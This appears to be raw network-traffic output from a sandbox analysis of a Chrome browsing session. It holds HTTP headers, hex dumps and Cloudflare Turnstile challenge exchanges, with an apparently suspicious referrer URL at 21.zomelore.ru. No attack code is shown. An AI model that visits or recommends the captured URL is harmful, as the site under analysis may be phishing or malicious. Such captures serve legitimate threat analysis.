                                                                                                                                                                                                          2024-12-11 23:29:00 UTC1369INData Raw: 44 4a 59 4d 6a 74 55 59 53 67 2f 50 69 68 5a 4a 6d 5a 6a 63 6c 46 77 50 31 68 43 55 48 70 6c 53 47 56 4d 64 6c 35 71 50 59 4e 61 50 57 5a 78 69 47 46 6f 51 32 74 69 62 45 56 51 54 6e 79 4b 62 6d 56 50 59 32 4e 52 64 49 4e 35 63 49 35 70 6b 46 68 5a 6b 4a 69 69 6d 61 46 36 6e 71 57 58 61 47 75 6c 62 34 46 2b 69 35 36 4b 72 71 53 30 74 37 68 30 74 62 79 2b 6a 48 39 34 73 61 43 5a 76 5a 42 38 77 34 69 31 6c 4b 75 63 69 73 4f 68 68 35 6d 74 6a 74 58 46 77 4d 37 46 70 5a 44 45 74 72 6e 63 71 39 4b 2b 32 4a 7a 53 6f 65 4c 59 34 74 54 42 34 39 76 57 77 50 44 63 71 75 65 39 74 4e 4c 66 77 75 62 4a 7a 76 72 33 2f 76 36 2b 75 63 72 7a 36 39 32 38 33 74 62 34 41 75 58 72 42 2f 37 76 37 73 33 68 44 41 4c 70 45 64 4d 55 45 4d 2f 6a 32 4e 7a 33 49 42 72 34 46 52 58 56
                                                                                                                                                                                                          Data Ascii: DJYMjtUYSg/PihZJmZjclFwP1hCUHplSGVMdl5qPYNaPWZxiGFoQ2tibEVQTnyKbmVPY2NRdIN5cI5pkFhZkJiimaF6nqWXaGulb4F+i56KrqS0t7h0tby+jH94saCZvZB8w4i1lKucisOhh5mtjtXFwM7FpZDEtrncq9K+2JzSoeLY4tTB49vWwPDcque9tNLfwubJzvr3/v6+ucrz69283tb4AuXrB/7v7s3hDALpEdMUEM/j2Nz3IBr4FRXV
                                                                                                                                                                                                          2024-12-11 23:29:00 UTC1369INData Raw: 5a 4c 61 55 70 61 50 44 6f 77 4c 55 64 6c 4c 58 4a 55 64 32 74 32 55 46 4a 59 4f 49 46 72 59 6a 77 2f 59 49 46 78 64 54 39 6c 5a 47 52 4d 58 49 2b 41 62 57 56 46 59 4a 57 50 64 6c 43 51 56 6e 46 6d 63 6e 2b 48 64 48 53 54 6d 6f 57 69 66 35 65 6a 65 32 47 57 66 49 71 58 62 70 74 6f 63 71 47 42 72 49 79 71 73 59 74 30 6c 62 43 4c 6d 48 75 66 6e 4c 4b 77 73 4d 4b 56 6b 61 47 49 77 58 32 66 71 71 54 4f 69 35 75 2b 6a 61 2b 2b 77 73 75 6c 78 35 72 50 7a 73 61 75 6d 5a 6a 5a 7a 4a 71 39 76 72 79 69 34 73 4b 2b 32 73 72 6c 34 61 61 37 38 66 4c 48 35 2b 37 76 34 75 6e 34 37 4d 76 77 79 76 44 57 32 39 4c 4d 33 4c 33 7a 41 77 54 69 39 67 50 69 33 77 50 4a 7a 4f 73 4d 30 73 6e 6b 37 50 50 6c 46 41 4c 57 38 42 62 34 31 76 55 57 47 64 67 45 37 51 34 6e 49 39 38 66 47
                                                                                                                                                                                                          Data Ascii: ZLaUpaPDowLUdlLXJUd2t2UFJYOIFrYjw/YIFxdT9lZGRMXI+AbWVFYJWPdlCQVnFmcn+HdHSTmoWif5eje2GWfIqXbptocqGBrIyqsYt0lbCLmHufnLKwsMKVkaGIwX2fqqTOi5u+ja++wsulx5rPzsaumZjZzJq9vryi4sK+2srl4aa78fLH5+7v4un47MvwyvDW29LM3L3zAwTi9gPi3wPJzOsM0snk7PPlFALW8Bb41vUWGdgE7Q4nI98fG
                                                                                                                                                                                                          2024-12-11 23:29:00 UTC1369INData Raw: 37 57 30 38 77 5a 32 42 54 57 54 56 51 54 31 52 32 66 6a 68 41 59 58 64 66 5a 47 56 57 5a 55 4e 35 57 34 5a 6d 65 6c 32 50 65 31 32 52 64 48 31 66 6c 5a 4a 6b 64 47 52 6b 61 47 6d 64 66 48 6c 76 63 4a 2b 46 67 48 43 45 67 48 4e 30 68 49 57 4d 5a 35 2b 64 6b 58 39 72 6a 48 2b 6d 72 6f 69 45 75 5a 47 70 66 61 35 38 74 71 48 42 74 71 47 50 78 71 43 70 6b 6f 47 34 74 73 61 68 6f 4d 32 62 6b 4d 32 39 7a 35 4f 53 77 70 4c 58 72 37 47 57 74 4f 47 2b 34 75 4f 37 73 4a 6a 55 71 4e 57 33 34 4d 47 37 74 39 37 4d 77 62 75 38 33 73 58 49 76 37 66 4a 78 73 50 71 31 73 75 78 75 74 6a 39 2b 74 50 58 43 50 4c 32 2f 63 63 48 44 67 58 71 37 39 2f 65 41 4e 7a 50 42 77 50 53 36 64 45 44 45 65 6f 47 32 52 37 65 43 77 76 39 37 75 38 43 38 66 6a 30 2b 53 6f 66 47 76 67 49 42 66
                                                                                                                                                                                                          Data Ascii: 7W08wZ2BTWTVQT1R2fjhAYXdfZGVWZUN5W4Zmel2Pe12RdH1flZJkdGRkaGmdfHlvcJ+FgHCEgHN0hIWMZ5+dkX9rjH+mroiEuZGpfa58tqHBtqGPxqCpkoG4tsahoM2bkM29z5OSwpLXr7GWtOG+4uO7sJjUqNW34MG7t97Mwbu83sXIv7fJxsPq1suxutj9+tPXCPL2/ccHDgXq79/eANzPBwPS6dEDEeoG2R7eCwv97u8C8fj0+SofGvgIBf
                                                                                                                                                                                                          2024-12-11 23:29:00 UTC1369INData Raw: 55 32 64 54 5a 30 64 66 63 6d 46 34 58 6c 31 34 64 48 4a 47 52 30 64 66 68 33 53 4e 53 34 70 6f 52 31 70 77 68 70 5a 70 62 4a 46 59 55 6f 53 57 57 48 52 77 62 31 32 43 66 32 35 6b 6e 34 4a 6e 67 4a 2b 43 6c 35 39 2f 61 49 47 49 73 6d 32 4c 73 37 53 55 6c 70 53 51 62 61 32 78 6a 4d 43 67 66 35 2b 39 6d 37 57 50 67 58 72 45 67 35 65 6a 68 36 36 2f 76 4b 75 69 74 49 32 70 71 38 48 48 6f 70 54 46 74 61 58 53 6e 38 43 31 76 71 79 38 33 4c 32 6d 78 38 71 69 74 75 6d 6f 78 2b 54 43 77 38 33 76 72 73 32 76 77 62 54 44 36 39 6e 6b 2b 73 72 72 41 65 6e 35 32 50 48 59 42 76 50 47 35 38 4c 66 79 75 6b 48 7a 50 73 54 36 76 48 73 7a 2f 48 32 39 4e 50 6d 39 74 66 36 36 52 51 69 31 39 37 7a 49 2f 66 77 46 4e 6f 4b 41 77 41 73 42 51 38 70 38 42 72 76 4e 43 2f 75 4f 50 63
                                                                                                                                                                                                          Data Ascii: U2dTZ0dfcmF4Xl14dHJGR0dfh3SNS4poR1pwhpZpbJFYUoSWWHRwb12Cf25kn4JngJ+Cl59/aIGIsm2Ls7SUlpSQba2xjMCgf5+9m7WPgXrEg5ejh66/vKuitI2pq8HHopTFtaXSn8C1vqy83L2mx8qitumox+TCw83vrs2vwbTD69nk+srrAen52PHYBvPG58LfyukHzPsT6vHsz/H29NPm9tf66RQi197zI/fwFNoKAwAsBQ8p8BrvNC/uOPc
                                                                                                                                                                                                          2024-12-11 23:29:00 UTC1369INData Raw: 32 42 4c 51 57 35 57 52 56 4b 45 64 48 78 58 64 48 57 45 62 46 74 64 6a 47 35 52 5a 6d 69 4e 68 6d 31 6e 6d 59 4e 76 5a 58 69 4b 6e 59 43 62 62 58 78 32 62 70 78 39 68 47 6c 35 6a 58 71 74 6f 6e 35 37 65 71 36 76 6a 71 2b 69 73 62 6d 7a 73 35 71 33 74 48 32 6f 77 61 47 2f 75 70 2f 46 75 36 65 61 68 5a 53 68 70 4d 43 62 7a 39 4b 45 79 4b 75 4e 6b 70 43 6d 7a 72 69 32 78 37 66 4a 34 4d 37 62 75 4f 4c 6a 34 75 47 36 6d 75 53 31 76 4c 54 57 35 4e 76 68 34 4f 57 77 78 74 50 78 79 39 57 79 32 76 7a 77 7a 73 62 33 74 2b 76 56 34 39 48 55 2b 77 47 36 38 51 44 4c 33 65 62 6e 42 4f 72 4a 35 63 30 51 35 63 33 74 30 67 62 33 31 51 66 78 44 78 67 55 45 74 6f 52 2b 66 30 6d 2f 51 55 65 4a 65 62 72 43 68 34 71 2f 69 6f 4a 44 44 41 57 4e 77 2f 78 4e 68 49 36 4a 79 67 78
                                                                                                                                                                                                          Data Ascii: 2BLQW5WRVKEdHxXdHWEbFtdjG5RZmiNhm1nmYNvZXiKnYCbbXx2bpx9hGl5jXqton57eq6vjq+isbmzs5q3tH2owaG/up/Fu6eahZShpMCbz9KEyKuNkpCmzri2x7fJ4M7buOLj4uG6muS1vLTW5Nvh4OWwxtPxy9Wy2vzwzsb3t+vV49HU+wG68QDL3ebnBOrJ5c0Q5c3t0gb31QfxDxgUEtoR+f0m/QUeJebrCh4q/ioJDDAWNw/xNhI6Jygx


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          19192.168.2.44976735.190.80.14431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:29:00 UTC537OUTOPTIONS /report/v4?s=xg3i%2F2DJOn9RrO%2FysZQ3HiAyoGL%2FSSgwNmx0epxf6oxUA2gyXkka%2BCmv7yfq%2BD7ZJsuOZpQeJbeDhfYcs0mPXYub5khf8ymrsIE4ttITO8U1bNu23GvWDb35Q4wwPg%3D%3D HTTP/1.1
                                                                                                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Origin: https://21.zomelore.ru
                                                                                                                                                                                                          Access-Control-Request-Method: POST
                                                                                                                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:29:01 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                          access-control-max-age: 86400
                                                                                                                                                                                                          access-control-allow-methods: POST, OPTIONS
                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                          access-control-allow-headers: content-length, content-type
                                                                                                                                                                                                          date: Wed, 11 Dec 2024 23:29:00 GMT
                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          20192.168.2.44977235.190.80.14431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:29:02 UTC480OUTPOST /report/v4?s=xg3i%2F2DJOn9RrO%2FysZQ3HiAyoGL%2FSSgwNmx0epxf6oxUA2gyXkka%2BCmv7yfq%2BD7ZJsuOZpQeJbeDhfYcs0mPXYub5khf8ymrsIE4ttITO8U1bNu23GvWDb35Q4wwPg%3D%3D HTTP/1.1
                                                                                                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Content-Length: 426
                                                                                                                                                                                                          Content-Type: application/reports+json
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:29:02 UTC426OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 35 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 32 31 2e 7a 6f 6d 65 6c 6f 72 65 2e 72 75 2f 72 77 44 48 72 56 57 45 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 37 33 2e 36 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c
                                                                                                                                                                                                          Data Ascii: [{"age":0,"body":{"elapsed_time":659,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://21.zomelore.ru/rwDHrVWE/","sampling_fraction":1.0,"server_ip":"104.21.73.64","status_code":404,"type":"http.error"},"type":"network-error",
                                                                                                                                                                                                          2024-12-11 23:29:02 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                          date: Wed, 11 Dec 2024 23:29:02 GMT
                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          21192.168.2.449773104.18.95.414431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:29:02 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/2052973775:1733955903:mwgDOxztvG-5XDI8u3krRI0LqZnjx6ACV_1HL3xWCHg/8f0940fe6c4f4373/CVmrfugbA_zqktzvG3JcRgs_mC_rv53iYzPMW._IILw-1733959736-1.1.1.1-UvbuVkQKEJNelwu1lbxWxXa26svM2baBo3khA2S2NQujCVwstPaAd55J9oE_yBaL HTTP/1.1
                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:29:02 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:29:02 GMT
                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                          Content-Length: 7
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          cf-chl-out: O5+HdyxD6IQBfBwlvjfNnnI8ZOYcVztNLNE=$6wmO6CYXDoJTHYyl
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8f0941273f240f47-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-12-11 23:29:02 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                          Data Ascii: invalid


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          22192.168.2.449776104.18.94.414431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:29:02 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8f0940fe6c4f4373/1733959740238/e4911a032d42c9b8fd75eecc8cc040b583fab29ebc575e2b46036d09e5d291e6/mvbqwLy3Iwfs6lP HTTP/1.1
                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ahw4n/0x4AAAAAAA1QAANc6ALCga__/auto/fbE/normal/auto/
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:29:03 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:29:02 GMT
                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                          Content-Length: 1
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2024-12-11 23:29:03 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 35 4a 45 61 41 79 31 43 79 62 6a 39 64 65 37 4d 6a 4d 42 41 74 59 50 36 73 70 36 38 56 31 34 72 52 67 4e 74 43 65 58 53 6b 65 59 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                          Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g5JEaAy1Cybj9de7MjMBAtYP6sp68V14rRgNtCeXSkeYAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                          2024-12-11 23:29:03 UTC1INData Raw: 4a
                                                                                                                                                                                                          Data Ascii: J


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          23192.168.2.449779104.18.94.414431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:29:04 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8f0940fe6c4f4373/1733959740242/qZT9_F68n3xQwRy HTTP/1.1
                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ahw4n/0x4AAAAAAA1QAANc6ALCga__/auto/fbE/normal/auto/
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:29:05 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:29:05 GMT
                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                          Content-Length: 61
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8f094136a86242ac-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-12-11 23:29:05 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 41 00 00 00 18 08 02 00 00 00 2a 14 07 2d 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                          Data Ascii: PNGIHDRA*-IDAT$IENDB`


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          24192.168.2.449782104.18.95.414431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:29:06 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8f0940fe6c4f4373/1733959740242/qZT9_F68n3xQwRy HTTP/1.1
                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:29:06 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:29:06 GMT
                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                          Content-Length: 61
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8f0941410a414232-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-12-11 23:29:06 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 41 00 00 00 18 08 02 00 00 00 2a 14 07 2d 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                          Data Ascii: PNGIHDRA*-IDAT$IENDB`


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          25192.168.2.449785104.18.94.414431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:29:06 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/2052973775:1733955903:mwgDOxztvG-5XDI8u3krRI0LqZnjx6ACV_1HL3xWCHg/8f0940fe6c4f4373/CVmrfugbA_zqktzvG3JcRgs_mC_rv53iYzPMW._IILw-1733959736-1.1.1.1-UvbuVkQKEJNelwu1lbxWxXa26svM2baBo3khA2S2NQujCVwstPaAd55J9oE_yBaL HTTP/1.1
                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Content-Length: 31643
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                          CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          CF-Challenge: CVmrfugbA_zqktzvG3JcRgs_mC_rv53iYzPMW._IILw-1733959736-1.1.1.1-UvbuVkQKEJNelwu1lbxWxXa26svM2baBo3khA2S2NQujCVwstPaAd55J9oE_yBaL
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ahw4n/0x4AAAAAAA1QAANc6ALCga__/auto/fbE/normal/auto/
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:29:06 UTC16384OUTData Raw: 76 5f 38 66 30 39 34 30 66 65 36 63 34 66 34 33 37 33 3d 43 6b 2d 50 4a 62 32 4f 44 62 44 63 6b 72 4f 41 46 31 72 30 50 34 50 4d 44 72 6b 51 37 72 4b 74 50 61 4b 44 62 59 72 63 50 63 2d 32 59 72 41 74 72 4d 41 50 72 4e 2d 72 65 50 43 2d 51 45 72 4d 47 70 32 72 32 24 72 61 55 4b 5a 2d 72 50 4d 4d 72 6b 50 65 76 77 72 35 32 2d 62 33 72 56 49 72 77 77 72 59 4b 39 49 72 54 50 51 63 71 43 39 4d 76 4e 72 43 57 35 7a 4a 2d 43 39 4d 46 72 56 50 32 4f 72 51 34 34 51 25 32 62 2d 72 71 7a 72 72 71 4d 39 72 30 72 65 43 74 72 72 76 54 46 4e 51 72 73 7a 6f 6a 46 49 72 36 4f 63 4a 44 33 43 6b 7a 46 33 62 49 69 49 73 6b 72 47 44 69 24 48 6c 43 62 39 39 72 39 33 62 7a 51 36 49 72 63 4b 45 6b 4d 7a 37 33 24 2d 61 31 50 4d 35 6e 31 6f 4d 33 33 2b 68 58 64 24 37 7a 2d 54 4c
                                                                                                                                                                                                          Data Ascii: v_8f0940fe6c4f4373=Ck-PJb2ODbDckrOAF1r0P4PMDrkQ7rKtPaKDbYrcPc-2YrAtrMAPrN-rePC-QErMGp2r2$raUKZ-rPMMrkPevwr52-b3rVIrwwrYK9IrTPQcqC9MvNrCW5zJ-C9MFrVP2OrQ44Q%2b-rqzrrqM9r0reCtrrvTFNQrszojFIr6OcJD3CkzF3bIiIskrGDi$HlCb99r93bzQ6IrcKEkMz73$-a1PM5n1oM33+hXd$7z-TL
                                                                                                                                                                                                          2024-12-11 23:29:06 UTC15259OUTData Raw: 62 42 2d 70 4d 2d 50 63 78 4b 42 69 72 51 33 47 41 72 31 72 55 72 2d 2d 4d 49 72 2d 72 62 2d 58 46 72 6b 72 74 72 63 6b 51 73 72 58 50 65 61 32 45 72 2b 43 24 42 32 4f 72 42 72 4d 44 51 62 72 54 31 43 2d 51 37 72 31 50 2d 2d 62 45 72 67 50 51 44 32 39 72 4b 72 72 31 72 67 72 69 50 34 41 72 33 72 78 44 54 49 72 31 4e 57 50 62 72 51 65 38 6f 64 45 44 4b 45 50 72 72 34 6f 44 72 62 39 2d 4b 62 73 32 58 36 67 49 62 67 6a 59 6b 4d 2d 51 76 72 36 4e 4c 42 69 48 50 75 72 39 67 62 62 49 30 44 65 39 51 30 79 54 72 75 75 66 4d 6a 50 51 4c 57 72 71 72 58 49 43 69 72 75 61 79 4f 61 4f 50 4e 72 24 65 45 6e 72 6c 38 58 49 2d 59 36 76 45 6e 57 45 58 50 6e 41 47 41 51 4b 6b 76 37 6a 4e 24 41 72 49 50 34 72 63 39 58 54 5a 76 76 32 74 4b 37 72 6a 74 67 45 72 79 49 38 41 4a
